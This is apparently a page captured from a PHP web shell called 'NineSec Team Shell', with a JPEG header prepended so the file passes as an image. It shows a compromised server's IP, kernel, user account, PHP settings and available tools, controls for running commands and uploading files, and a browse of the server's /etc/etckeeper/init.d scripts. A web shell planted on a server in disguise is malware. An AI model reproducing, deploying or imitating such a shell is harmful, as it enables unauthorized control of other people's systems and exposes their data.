�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /etc/etckeeper/init.d/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //etc/etckeeper/init.d/70vcs-add
#!/bin/sh
set -e

if [ "$VCS" = git ]; then
	if ! git add .; then
		echo "etckeeper warning: git add failed" >&2
	fi
elif [ "$VCS" = hg ]; then
	if ! hg add .; then
		echo "etckeeper warning: hg add failed" >&2
	fi
elif [ "$VCS" = bzr ]; then
	if ! bzr add .; then
		echo "etckeeper warning: bzr add failed" >&2
	fi
elif [ "$VCS" = darcs ]; then
	# Don't warn if all the files were already added.
	rc=0
	res=$( darcs add -qr . 2>&1 ) || rc=$?
	if test $rc -ne 0; then
		if ! test $rc -eq 2 -a "${res%No files were added}" != "$res"; then
			printf "%s" "$res"
			echo "etckeeper warning: darcs add failed" >&2
		fi
	fi
	unset rc res
fi

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
March 29 2022 10:49:59
root
0755
10restore-metadata
0.476 KB
March 30 2020 12:24:10
root
0755
20restore-etckeeper
0.405 KB
March 30 2020 12:24:10
root
0755
40vcs-init
0.491 KB
March 30 2020 12:24:10
root
0755
50vcs-ignore
0.052 KB
March 30 2020 12:24:10
root
0755
50vcs-perm
0.192 KB
March 30 2020 12:24:10
root
0755
50vcs-pre-commit-hook
1.458 KB
March 30 2020 12:24:10
root
0755
60darcs-deleted-symlinks
1.319 KB
March 30 2020 12:24:10
root
0755
70vcs-add
0.621 KB
March 30 2020 12:24:10
root
0755
README
0.681 KB
March 30 2020 12:24:10
root
0644

NineSec Team - 2022